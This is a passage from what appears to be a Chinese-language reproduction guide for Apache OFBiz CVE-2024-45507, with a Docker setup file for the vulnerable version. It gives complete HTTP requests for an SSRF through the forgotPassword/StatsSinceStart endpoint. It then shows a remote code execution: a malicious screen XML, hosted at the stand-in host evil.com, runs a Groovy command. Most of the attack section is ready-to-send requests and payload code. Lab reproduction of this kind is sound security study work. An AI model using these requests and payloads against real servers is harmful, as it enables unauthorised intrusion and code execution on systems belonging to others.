docker compose up -d
```
等待片刻后,您可以在`https://localhost:8443/accounting`看到登录页面。
## 漏洞复现
### SSRF漏洞
`/webtools/control/forgotPassword/StatsSinceStart`发送以下POST请求即可
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: your-ip:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://10.10.10.10/path/to/api
```
## 远程代码执行漏洞
在公共服务器上创建一个恶意的XML文件payload.xml例如`http://evil.com/ofbiz/payload.xml`
```xml
<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">
<screen name="StatsDecorator">
<section>
<actions>
<set value="${groovy:'touch /tmp/success'.execute();}"/>
</actions>
</section>
</screen>
</screens>
```
然后将恶意XML的URL替换进请求中发送
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: your-ip:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://evil.com/ofbiz/payload.xml
```
![](1.png)
进入容器中,可见命令`touch /tmp/success`已经被成功执行:
![](2.png)

6
ofbiz/CVE-2024-45507/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.15
ports:
- "8443:8443"
- "5005:5005"